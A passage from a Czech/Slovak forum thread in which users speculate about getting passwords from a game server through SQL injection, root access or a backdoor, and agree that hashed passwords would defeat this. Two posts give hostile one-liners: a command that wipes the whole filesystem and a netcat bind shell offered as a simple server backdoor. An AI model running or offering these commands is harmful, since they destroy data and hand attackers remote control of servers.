Citace Původně odeslal K4M1L Zobrazit příspěvek
Pravda SQL injection je trochu něco jinýho ta by ti k heslu nepomohla, ale kdyby (opakuji kdyby ) se ti to povedlo, mohl by jsi db pěkně vytížit totéž root na serveru rm -rf /
To už nejde jen tak, musíš mu to vnutit přes --no-preserve-root nebo jednodušejc:
Kód:
rm -rf /*
Citace Původně odeslal blackened Zobrazit příspěvek
hovorím, že s tou DB neviem backdoor je, že máš v systéme akési zadne vrátka pomocou čoho možeš obísť nejaké zabezpečenie .
/ zobrane z wiki: Tzv. zadné vrátka (backdoor)- komunikačný klient, ktorý komunikuje so serverom autora programu a umožňuje okrem iného aj úplné ovládnutie hostiteľského počítača.
Takže je to to samý jako bys měl přístup na server...
Citace Původně odeslal The_Odik Zobrazit příspěvek
Stejnak by to bylo naprosto k hovnu, když, jak už se tu několikrát řeklo, všechny hesla jsou hashovaný, takže na to ti nepomůže ani root na mašinu
btw. nejjednodušší backdoor co asi znám je (pro server):
Kód:
nc -l 1234 | bash | nc -l 1235
Citace Původně odeslal blackened Zobrazit příspěvek
p.s. Ako určite vieš, aj cataclystir sa podarilo čiastočne odheslovať. Aj keď to chvílku trvalo.
To je možný, ale pořád je to hashlý... mělo by. S timhle si sice nejsem tak jistej, ale nepředpokládám, že by blizzard posílal hesla v plaintextu